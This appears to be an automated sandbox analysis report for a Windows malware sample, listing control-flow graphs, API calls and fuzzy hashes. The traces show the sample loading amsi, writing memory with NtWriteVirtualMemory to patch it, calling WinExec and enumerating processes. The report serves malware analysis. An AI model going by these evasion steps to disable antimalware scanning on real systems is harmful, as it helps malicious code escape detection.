                                                                                                                                          control_flow_graph 10194 2aaafe0-2aaafec 10195 2aab0c8-2aab0d2 IsBadReadPtr 10194->10195 10196 2aab0e4-2aab0ea 10195->10196 10197 2aab0d4-2aab0d8 10195->10197 10197->10196 10198 2aab0da-2aab0de 10197->10198 10198->10196 10199 2aaaff1-2aab007 IsBadReadPtr 10198->10199 10200 2aab00d-2aab044 GetModuleHandleW call 2aa8274 10199->10200 10201 2aab0c5 10199->10201 10205 2aab0a8-2aab0b2 IsBadReadPtr 10200->10205 10206 2aab046-2aab04b 10200->10206 10201->10195 10205->10201 10207 2aab0b4-2aab0be IsBadReadPtr 10205->10207 10206->10205 10207->10201 10208 2aab0c0-2aab0c3 10207->10208 10208->10201 10209 2aab04d-2aab05f call 2aa84c8 10208->10209 10212 2aab0a2-2aab0a5 10209->10212 10213 2aab061-2aab065 10209->10213 10212->10205 10214 2aab07c-2aab08e call 2aa8274 10213->10214 10215 2aab067-2aab07a call 2aa8274 10213->10215 10220 2aab090-2aab09d call 2aa84c8 10214->10220 10215->10220 10220->10212
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAB000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02AAB017
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02AAB0AB
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02AAB0B7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02AAB0CB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: Read$HandleModule
• String ID: KernelBase$LoadLibraryExA
• API String ID: 2226866862-113032527
• Opcode ID: f088a69d652fa92251bb5cd1c2d57d4da6915cb0e8f229db212de6f71c58e641
• Instruction ID: 45b6c059ab5ad91c4a697db2aa77f8af1e8a9bb9fd28a1382d0f0693cacfd0f5
• Opcode Fuzzy Hash: f088a69d652fa92251bb5cd1c2d57d4da6915cb0e8f229db212de6f71c58e641
• Instruction Fuzzy Hash: 593162B1640305BBDB20DB69CD96F5AB7A8BF15758F004914EB24EB281DB34A954CB60

Control-flow Graph

                                                                                                                                          control_flow_graph 12102 2a91724-2a91736 12103 2a91968-2a9196d 12102->12103 12104 2a9173c-2a9174c 12102->12104 12107 2a91a80-2a91a83 12103->12107 12108 2a91973-2a91984 12103->12108 12105 2a9174e-2a9175b 12104->12105 12106 2a917a4-2a917ad 12104->12106 12109 2a9175d-2a9176a 12105->12109 12110 2a91774-2a91780 12105->12110 12106->12105 12113 2a917af-2a917bb 12106->12113 12114 2a91a89-2a91a8b 12107->12114 12115 2a91684-2a916ad VirtualAlloc 12107->12115 12111 2a91938-2a91945 12108->12111 12112 2a91986-2a919a2 12108->12112 12116 2a9176c-2a91770 12109->12116 12117 2a91794-2a917a1 12109->12117 12119 2a917f0-2a917f9 12110->12119 12120 2a91782-2a91790 12110->12120 12111->12112 12118 2a91947-2a9195b Sleep 12111->12118 12121 2a919b0-2a919bf 12112->12121 12122 2a919a4-2a919ac 12112->12122 12113->12105 12125 2a917bd-2a917c9 12113->12125 12123 2a916df-2a916e5 12115->12123 12124 2a916af-2a916dc call 2a91644 12115->12124 12118->12112 12128 2a9195d-2a91964 Sleep 12118->12128 12126 2a917fb-2a91808 12119->12126 12127 2a9182c-2a91836 12119->12127 12131 2a919d8-2a919e0 12121->12131 12132 2a919c1-2a919d5 12121->12132 12129 2a91a0c-2a91a22 12122->12129 12124->12123 12125->12105 12133 2a917cb-2a917de Sleep 12125->12133 12126->12127 12136 2a9180a-2a9181e Sleep 12126->12136 12137 2a918a8-2a918b4 12127->12137 12138 2a91838-2a91863 12127->12138 12128->12111 12139 2a91a3b-2a91a47 12129->12139 12140 2a91a24-2a91a32 12129->12140 12134 2a919fc-2a919fe call 2a915cc 12131->12134 12135 2a919e2-2a919fa 12131->12135 12132->12129 12133->12105 12142 2a917e4-2a917eb Sleep 12133->12142 12143 2a91a03-2a91a0b 12134->12143 12135->12143 12136->12127 12145 2a91820-2a91827 Sleep 12136->12145 12151 2a918dc-2a918eb call 2a915cc 12137->12151 12152 2a918b6-2a918c8 12137->12152 12146 2a9187c-2a9188a 12138->12146 12147 2a91865-2a91873 12138->12147 12149 2a91a49-2a91a5c 12139->12149 
12150 2a91a68 12139->12150 12140->12139 12148 2a91a34 12140->12148 12142->12106 12145->12126 12155 2a918f8 12146->12155 12156 2a9188c-2a918a6 call 2a91500 12146->12156 12147->12146 12154 2a91875 12147->12154 12148->12139 12157 2a91a6d-2a91a7f 12149->12157 12158 2a91a5e-2a91a63 call 2a91500 12149->12158 12150->12157 12161 2a918fd-2a91936 12151->12161 12165 2a918ed-2a918f7 12151->12165 12159 2a918ca 12152->12159 12160 2a918cc-2a918da 12152->12160 12154->12146 12155->12161 12156->12161 12158->12157 12159->12160 12160->12161
APIs
• Sleep.KERNEL32(00000000,?,02A91FC1), ref: 02A917D0
• Sleep.KERNEL32(0000000A,00000000,?,02A91FC1), ref: 02A917E6
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 1b9d341a3c09437c5988d8864b6555a4f63dd94175dc675cf54b7378890343d8
• Instruction ID: 47caba1ccca30fdcadf36160a5427a149e138249a959e52b7c92d7cb7dd45e9f
• Opcode Fuzzy Hash: 1b9d341a3c09437c5988d8864b6555a4f63dd94175dc675cf54b7378890343d8
• Instruction Fuzzy Hash: 02B13472A002528FCF16CF2AD8C4355BBF1EF86395F5986AED45D8B385CB709452CB90

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(amsi), ref: 02AA88C1
  • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
  • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
• FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02AA8920
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
• String ID: DllGetClassObject$W$amsi
• API String ID: 941070894-2671292670
• Opcode ID: 8bf0501b7d5b415c407b22ce9b45a1cfc3bf9f350c272d60334910355615032b
• Instruction ID: 8e76865082aa0fd2dacfc53d0faea36b8198ebc9a2b23e9927dd0c5cc6580cce
• Opcode Fuzzy Hash: 8bf0501b7d5b415c407b22ce9b45a1cfc3bf9f350c272d60334910355615032b
• Instruction Fuzzy Hash: 84F0816158C381B9D300E3748C55F4FBACD5F62664F008A18B1A89B2D2DA79D1048B67

Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 12190 2a91a8c-2a91a9b 12191 2a91b6c-2a91b6f 12190->12191 12192 2a91aa1-2a91aa5 12190->12192 12193 2a91c5c-2a91c60 12191->12193 12194 2a91b75-2a91b7f 12191->12194 12195 2a91b08-2a91b11 12192->12195 12196 2a91aa7-2a91aae 12192->12196 12199 2a916e8-2a9170b call 2a91644 VirtualFree 12193->12199 12200 2a91c66-2a91c6b 12193->12200 12202 2a91b3c-2a91b49 12194->12202 12203 2a91b81-2a91b8d 12194->12203 12195->12196 12201 2a91b13-2a91b27 Sleep 12195->12201 12197 2a91adc-2a91ade 12196->12197 12198 2a91ab0-2a91abb 12196->12198 12208 2a91ae0-2a91af1 12197->12208 12209 2a91af3 12197->12209 12206 2a91abd-2a91ac2 12198->12206 12207 2a91ac4-2a91ad9 12198->12207 12221 2a9170d-2a91714 12199->12221 12222 2a91716 12199->12222 12201->12196 12210 2a91b2d-2a91b38 Sleep 12201->12210 12202->12203 12211 2a91b4b-2a91b5f Sleep 12202->12211 12204 2a91b8f-2a91b92 12203->12204 12205 2a91bc4-2a91bd2 12203->12205 12213 2a91b96-2a91b9a 12204->12213 12205->12213 12215 2a91bd4-2a91bd9 call 2a914c0 12205->12215 12208->12209 12214 2a91af6-2a91b03 12208->12214 12209->12214 12210->12195 12211->12203 12216 2a91b61-2a91b68 Sleep 12211->12216 12218 2a91bdc-2a91be9 12213->12218 12219 2a91b9c-2a91ba2 12213->12219 12214->12194 12215->12213 12216->12202 12218->12219 12226 2a91beb-2a91bf2 call 2a914c0 12218->12226 12223 2a91bf4-2a91bfe 12219->12223 12224 2a91ba4-2a91bc2 call 2a91500 12219->12224 12227 2a91719-2a91723 12221->12227 12222->12227 12230 2a91c2c-2a91c59 call 2a91560 12223->12230 12231 2a91c00-2a91c28 VirtualFree 12223->12231 12226->12219
APIs
• Sleep.KERNEL32(00000000,?,?,00000000,02A91FE4), ref: 02A91B17
• Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02A91FE4), ref: 02A91B31
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
Control-flow Graph (graph image not reproduced)
APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02AAE5F6
Strings
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
APIs
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
  • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
• WinExec.KERNEL32(?,?), ref: 02AA8624
Strings
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
APIs
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
  • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
  • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
  • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
• WinExec.KERNEL32(?,?), ref: 02AA8624
Strings
Similarity
• API ID: HandleModule$AddressProc$Exec
• String ID: Kernel32$WinExec
• API String ID: 2292790416-3609268280
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
• SysAllocStringLen.OLEAUT32(?,?), ref: 02A94D5B
• SysFreeString.OLEAUT32(00000000), ref: 02A94D6D
Similarity
• API ID: String$Free$Alloc
• String ID:
• API String ID: 986138563-0
APIs
• SysFreeString.OLEAUT32(?), ref: 02AA73DA
Strings
Similarity
• API ID: FreeString
• String ID: H
• API String ID: 3341692771-2852464175
                                                                                                                                          • Opcode ID: bf696504626bbc9ccb84a6554efc48b54411cd2bc9681a9f284f88538f6a834e
                                                                                                                                          • Instruction ID: 257ddc6929e54cb2c05e9e70833975ed5da7944f239cc4f98262136821931263
                                                                                                                                          • Opcode Fuzzy Hash: bf696504626bbc9ccb84a6554efc48b54411cd2bc9681a9f284f88538f6a834e
                                                                                                                                          • Instruction Fuzzy Hash: 5AB1D274A016089FDB15CF99D990AAEFBF2FF89314F1585A9E805AB320DB30AC45CF50
                                                                                                                                          APIs
                                                                                                                                          • VariantCopy.OLEAUT32(00000000,00000000), ref: 02A9E781
                                                                                                                                            • Part of subcall function 02A9E364: VariantClear.OLEAUT32(?), ref: 02A9E373
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Variant$ClearCopy
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 274517740-0
                                                                                                                                          • Opcode ID: 4a2ca552491bc55f6b8fe2cd651b468b0c20f8b602bf382d1aeb5be524d5688a
                                                                                                                                          • Instruction ID: e6e9b8b4e1289306ec93bce529c5045f263d0b0e0545b4c4b7b1ff5212f78da7
                                                                                                                                          • Opcode Fuzzy Hash: 4a2ca552491bc55f6b8fe2cd651b468b0c20f8b602bf382d1aeb5be524d5688a
                                                                                                                                          • Instruction Fuzzy Hash: 8F115E70750210C7CF34EB6BCBC4AAA67EAAF85651B009467E54A8B216DF31CC41CB62
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitVariant
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1927566239-0
                                                                                                                                          • Opcode ID: a0586a4889e1fbf9f84ee880e8b8124f177f9ca9e0c3d33b83a70f0c709a09b0
                                                                                                                                          • Instruction ID: 40058b23476c0dd6597e42f0ea9cc63381c539af5e6dd87d5ba38cc31e7d7b02
                                                                                                                                          • Opcode Fuzzy Hash: a0586a4889e1fbf9f84ee880e8b8124f177f9ca9e0c3d33b83a70f0c709a09b0
                                                                                                                                          • Instruction Fuzzy Hash: 60315071640218EBDF10DFAACAC4AAA77F9EB4E314F444466F905D3242DB36D950CBA1
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02AA823C,?,?,00000000,?,02AA7A7E,ntdll,00000000,00000000,02AA7AC3,?,?,00000000), ref: 02AA820A
                                                                                                                                            • Part of subcall function 02AA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02AA821E
                                                                                                                                            • Part of subcall function 02AA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
                                                                                                                                            • Part of subcall function 02AA8274: GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
                                                                                                                                            • Part of subcall function 02AA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02AA7DEC
                                                                                                                                            • Part of subcall function 02AA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02AA83C2), ref: 02AA83A4
                                                                                                                                          • FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,02B1738C,Function_0000662C,00000004,02B1739C,02B1738C,05F5E103,00000040,02B173A0,75370000,00000000,00000000), ref: 02AA8AAA
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1478290883-0
                                                                                                                                          • Opcode ID: 8a560e41471745e6ab9f770efe23a41471b0fbe1f1462d78e2d1f12528b0d0e0
                                                                                                                                          • Instruction ID: 961f368736cfa9c8404a6591687bd2df35321a95c6ac17bbad1b5c1da1effc13
                                                                                                                                          • Opcode Fuzzy Hash: 8a560e41471745e6ab9f770efe23a41471b0fbe1f1462d78e2d1f12528b0d0e0
                                                                                                                                          • Instruction Fuzzy Hash: 502115706C0300BFEB40FBA5EE11B5EB7E9EF04B00F504590B505E7190DF7499419A19
                                                                                                                                          APIs
                                                                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02AA6DB9,?,?,?,00000000), ref: 02AA6D99
                                                                                                                                            • Part of subcall function 02A94C60: SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeFromProgString
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4225568880-0
                                                                                                                                          • Opcode ID: 0464fcb50a5962ba1fbd8600d4e78896f0fb43d4b6e18dea4a290b5f64f378d0
                                                                                                                                          • Instruction ID: e939e31de1e0b2d7826b1357fa721889343fffcaeb1d4a91f38a4389412df17a
                                                                                                                                          • Opcode Fuzzy Hash: 0464fcb50a5962ba1fbd8600d4e78896f0fb43d4b6e18dea4a290b5f64f378d0
                                                                                                                                          • Instruction Fuzzy Hash: 6FE0A035280B087BEB11EA669D5194A77EDDF8AB50B5104B1A40093500DE316E0088A0
                                                                                                                                          APIs
                                                                                                                                          • GetModuleFileNameA.KERNEL32(02A90000,?,00000105), ref: 02A95886
                                                                                                                                            • Part of subcall function 02A95ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A90000,02ABE790), ref: 02A95AE8
                                                                                                                                            • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B06
                                                                                                                                            • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02A90000,02ABE790), ref: 02A95B24
                                                                                                                                            • Part of subcall function 02A95ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02A95B42
                                                                                                                                            • Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02A95B8B
                                                                                                                                            • Part of subcall function 02A95ACC: RegQueryValueExA.ADVAPI32(?,02A95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02A95BD1,?,80000001), ref: 02A95BA9
                                                                                                                                            • Part of subcall function 02A95ACC: RegCloseKey.ADVAPI32(?,02A95BD8,00000000,?,?,00000000,02A95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02A95BCB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2796650324-0
                                                                                                                                          • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                          • Instruction ID: 8c04e23ef294845c9156600aec11a0d97864036628410415691c5bd2eee7d936
                                                                                                                                          • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                                          • Instruction Fuzzy Hash: 44E065B1E003149FCF10DFA8C9C1B8633D8AB08750F4449A1EC68CF24ADBB0DA248BE0
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02AAAB1C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02AAADA3,?,?,02AAAE35,00000000,02AAAF11), ref: 02AAAB30
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02AAAB48
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02AAAB5A
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02AAAB6C
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02AAAB7E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02AAAB90
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02AAABA2
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02AAABB4
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02AAABC6
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02AAABD8
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02AAABEA
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02AAABFC
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02AAAC0E
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02AAAC20
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02AAAC32
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02AAAC44
                                                                                                                                            • Part of subcall function 02AAAB1C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02AAAC56
                                                                                                                                          • Process32First.KERNEL32(?,00000128), ref: 02AAADC9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
                                                                                                                                           • Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                           • Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressProc$FirstHandleModuleProcess32
